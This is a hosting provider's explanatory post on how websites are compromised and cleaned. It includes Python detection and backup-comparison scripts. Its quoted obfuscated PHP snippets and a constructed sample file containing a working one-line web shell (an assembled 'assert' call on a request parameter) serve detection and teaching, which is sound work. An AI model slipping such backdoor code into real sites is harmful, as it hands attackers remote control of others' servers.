Dissecting web site attacks: What you should know.

The Internet has become a money-making machine for many people. We're happy to see this, as it has allowed many of our customers to become successful. A customer with a successful web business is bound to be a customer that pays their hosting bill on time! Unfortunately there are also unscrupulous no-goodniks who will do anything to make another dollar. Some of their favorite forms of monetization include infecting sites with hidden spam links, stealing a site's traffic via redirects, uploading phishing pages, or worse: turning a site into a node of a web-based botnet whose access is sold to the highest bidder on an underground forum or IRC channel.

Attacks on web sites and applications have evolved rapidly over the last decade, alongside the rise of global Internet access and our dependence on it. As is always the case, more money changing hands, and growing comfort with those transactions, has brought the Internet to the forefront of the revenue models of criminal gangs and crooks of all sorts.

Long gone are the days when the worst a site owner could expect from a compromise was a modified front page, usually carrying some sort of nasty message or witty prose. Current web-based attacks do their best to cover their tracks so that the attackers get the maximum amount of time to do their criminal business. This works in the attacker's favor: as long as the website owner believes the site looks and functions as intended, no second thought is given to the possibility that it has been compromised by fraudsters and no-goodniks.

Understanding these criminals and their intentions will prepare you to deal with them effectively when they cross your path.

Scene One: “The Attack!”

The criminal's goal is simple: infect as many sites and systems as possible without being detected, then cash in by selling access to the infected systems. The attack starts with scanning software armed with known vulnerabilities and lists of weak passwords. It rapidly scans random IP addresses and search engine results for any trace of web sites running vulnerable software. Once a target is compromised, the attackers upload backdoor shells and hide them somewhere on the site where they will not be noticed. As you may have guessed, those backdoor shells can run the same scanning mechanisms and will be used to compromise more sites and expand the network under the criminal's control!

The above alone doesn't earn the criminal any cash. All they have is a list of 'attack nodes' at their disposal. This is where the entrepreneurial criminal comes into play. They hold on to part of their attack nodes and keep them safe, while offering access to the other nodes for a price... And who would buy access to these nodes? More criminals, of course!

By this time the site has been compromised for days, weeks or even months and will begin to show signs of having been exploited. At some point the original criminal sells access to spammers. As career spammers are affectionately known to do, they upload spam pages (pharmacy and phishing pages are common), or they sell your site on to shady marketers who use it in a black-hat SEO campaign to boost a spammy site. Besides spammers, it is also common for these criminals to sell to other criminals building their own botnets. They pay for access to the backdoor just to upload their own backdoor! (Criminals stealing from criminals; what else would they expect?)

In the end, it isn't uncommon to see a compromised site end up looking like a hot mess, with dozens of backdoors uploaded and hidden all over it. In the worst cases, spammer links are injected into every page on the site, so that every visitor who is simply looking for your site, "Bob's Toy Emporium", on a popular search engine somehow finds themselves redirected to buy little blue pills on a not-so-legitimate site.

Scene Two: “Don’t Let The Bad Guys Win!” (aka: “What YOU Can Do”)

Prevention!
It's easier to stop the attackers before they hit than to clean up after them. The vast majority of web-based attacks can be prevented by choosing a strong passphrase, by using SFTP instead of plain FTP (FTP sends your password across the network in clear text; change that habit today!), and by upgrading your website software as soon as an update is available. We make updating many popular website applications easy with our One-Click Installation system, though plugins, add-ons and custom code are still your responsibility to upgrade.

Detection!
“Because knowing is half the battle.”
Be aware of the files on your site and review them occasionally. See something out of place? Check into it! If it looks like a blind and rabid cat got hold of the keyboard, you might just have a problem (possibly a worse one than if you actually had a blind rabid cat on your hands). Here are two quick examples of malicious code we commonly see appended to website files:

eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydC

or

$HixNlV='as';$eQovrf='e';$xsEWcg=$HixNlV.'s'.$eQovrf.'r'.'t';$HtJYXB='b'.$HixNlV.$eQovrf

Attackers use many methods to obfuscate the purpose of their backdoors, but they all have one thing in common: they don't want you to understand what the code does. The base64 string in the first example decodes to the beginning of if(function_exists('ob_start, and the second assembles the function name assert (and starts assembling another) from short string fragments, so that a simple search for "assert" or "eval" won't find it. There are some exceptions, but if a file doesn't seem to belong on your site and you didn't put it there, there is reason to believe that you have been exploited.
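As an added example that is not part of the original post, here is a small Python script that sweeps a directory tree for the two obfuscation styles shown above and, for eval(base64_decode(...)) payloads, decodes the visible prefix of the base64 string so you can see how it begins even when the literal is cut off. The sample site it creates is constructed for the demo, not taken from a real server, and the patterns are heuristics: a hit means "look at this file", not proof of compromise.

```python
"""Signature sweep for obfuscated PHP backdoors (added example, not the host's own scanner)."""
import base64
import os
import re
import tempfile

# Constructed sample site: one clean file plus two files carrying the
# obfuscation styles quoted in the post (straight quotes, as in real PHP).
# The base64 literal is truncated exactly as it appears in the post.
SAMPLE_SITE = {
    "index.php": "<?php echo 'Welcome to the toy emporium'; ?>\n",
    "wp-content/uploads/.cache.php":
        '<?php eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydC")); ?>\n',
    "footer.php":
        "<?php $HixNlV='as';$eQovrf='e';$xsEWcg=$HixNlV.'s'.$eQovrf.'r'.'t';"
        "$HtJYXB='b'.$HixNlV.$eQovrf.'64_decode';$xsEWcg($HtJYXB('ZWNobyAxOw==')); ?>\n",
}

# Heuristic signatures: each is a (label, compiled regex) pair.
SIGNATURES = [
    ("eval of a decoded payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    # three or more short fragments/variables joined with '.' ending in a short literal
    ("function name built from string fragments",
     re.compile(r"(?:(?:'\w{1,3}'|\$\w+)\s*\.\s*){3,}'\w{1,3}'")),
    ("variable function calling another variable function",
     re.compile(r"\$\w+\s*\(\s*\$\w+\s*\(")),
    # capture group 1 is the base64 literal so we can decode a preview of it
    ("long base64 literal passed to base64_decode",
     re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/]{30,})")),
]


def decode_base64_prefix(literal):
    """Decode the longest 4-character-aligned prefix of a (possibly truncated)
    base64 string, so even a cut-off payload reveals how it begins."""
    usable = literal[: len(literal) - len(literal) % 4]
    return base64.b64decode(usable).decode("latin-1")


def scan_text(text):
    """Return a list of (label, evidence) findings for one file's contents."""
    findings = []
    for label, pattern in SIGNATURES:
        for match in pattern.finditer(text):
            evidence = match.group(0)[:60]
            if match.groups():  # only the base64 signature captures a group
                evidence += "  -> decodes to: " + decode_base64_prefix(match.group(1))[:40]
            findings.append((label, evidence))
    return findings


def scan_tree(root):
    """Walk a site tree; return {relative path: findings} for files that hit."""
    report = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_text(fh.read())
            if findings:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


def write_sample_site(root):
    """Materialise the constructed sample files under root."""
    for rel, body in SAMPLE_SITE.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Scan the constructed sample site and return the report."""
    with tempfile.TemporaryDirectory() as root:
        write_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, findings in sorted(demo().items()):
        print(path)
        for label, evidence in findings:
            print(f"  [{label}] {evidence}")
```

To use it on a real download, call scan_tree() on the directory instead of demo(). Expect some false positives from legitimate minified or templating code that builds strings with many short fragments; the point is to shortlist files for a human to read, not to judge them automatically.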

Scene Three:
What do you do if you think you’re compromised? Undo what the attackers did and secure your site from further abuse.

It is vital that you remove every backdoor added to your site and take action to prevent further attacks. These two steps are a lot easier than most people think, but you cannot be lazy about them. First, check your site's files for additions and modifications. If you find anything that doesn't belong there, disable, quarantine or remove it! Be sure to double-check that all of your site's software has been upgraded to the latest versions so that known security holes are closed. Finally, don't forget to change your passwords (FTP, SSH, MySQL) too, in case those were compromised as well, and do it after the backdoors are gone: a backdoor that is still in place can simply capture the new ones.

What’s that? Your site has over 1,000 files and you want the site’s web master to check them all? Oh my!

You can tackle two problems at once, backups and security, with the following tip. If a site is worth spending 10 minutes writing content for, it is worth keeping a backup of on your home or office computer. That backup will not only help you get your site back online after almost any disaster, it will also help you identify exactly what the attackers changed.

How? Since you're now a savvy website owner who keeps clean backups locally, you can download the "compromised" version of your site and use file comparison software* to compare it against the clean copy and see exactly what has changed. Compare file contents rather than relying on modification dates, since attackers routinely reset the timestamps on files they touch. You'll also be better prepared for a possible "cyber forensics" role in the next episode of CSI...

*(search online for “compare directories” plus your operating system of choice and you will find tons of options!)
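Here, as an added example that is not part of the original post, is that comparison done by hand in Python: hash every file in the clean backup and in the downloaded live copy, then list what was added, removed or modified. It builds two small constructed directory trees for the demo; point manifest() at your real backup and live download instead.

```python
"""Compare a clean backup against a live site copy by content hash (added example)."""
import hashlib
import os
import tempfile

# Constructed trees, not real site data: the live copy carries one added
# backdoor, one modified template and one deleted file.
CLEAN_SITE = {
    "index.php": "<?php include 'header.php'; echo 'toys'; ?>\n",
    "header.php": "<?php echo '<h1>Toy Emporium</h1>'; ?>\n",
    "footer.php": "<?php echo '<p>Copyright Bob</p>'; ?>\n",
    "robots.txt": "User-agent: *\nDisallow:\n",
}
LIVE_SITE = dict(CLEAN_SITE)
LIVE_SITE["footer.php"] = CLEAN_SITE["footer.php"] + "<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n"
LIVE_SITE["images/.thumb.php"] = "<?php $x='as';$x.='sert';$x($_REQUEST['c']); ?>\n"
del LIVE_SITE["robots.txt"]


def sha256_of(path):
    """SHA-256 of a file's contents, read in chunks so large files are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root):
    """{relative path: sha256} for every file under root."""
    out = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            out[os.path.relpath(path, root).replace(os.sep, "/")] = sha256_of(path)
    return out


def compare(clean, live):
    """Diff two manifests; returns sorted lists of added/removed/modified paths.
    Hashes, not timestamps, decide 'modified', so a touched mtime cannot hide a change."""
    return {
        "added": sorted(set(live) - set(clean)),
        "removed": sorted(set(clean) - set(live)),
        "modified": sorted(p for p in set(clean) & set(live) if clean[p] != live[p]),
    }


def write_tree(root, files):
    """Materialise a constructed tree under root."""
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build both constructed trees and return the comparison."""
    with tempfile.TemporaryDirectory() as clean_dir, tempfile.TemporaryDirectory() as live_dir:
        write_tree(clean_dir, CLEAN_SITE)
        write_tree(live_dir, LIVE_SITE)
        return compare(manifest(clean_dir), manifest(live_dir))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}:")
        for p in paths:
            print(f"  {p}")
```

Everything in "added" and "modified" is what you read first; "removed" matters too, since attackers sometimes delete .htaccess or other files that were getting in their way. Save the manifest of the clean copy alongside the backup and you can re-run the comparison after every cleanup or upgrade.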

By now your site should be secure (knock on wood), so you can put it back online knowing the bad guys have fewer nodes from which to attack other websites and servers. If you haven't already, please contact our support staff and let us know that you think you've been hacked. Our security team will then run a basic scan of your site's files, and if we see any insecure software or known backdoors on your site we will let you know!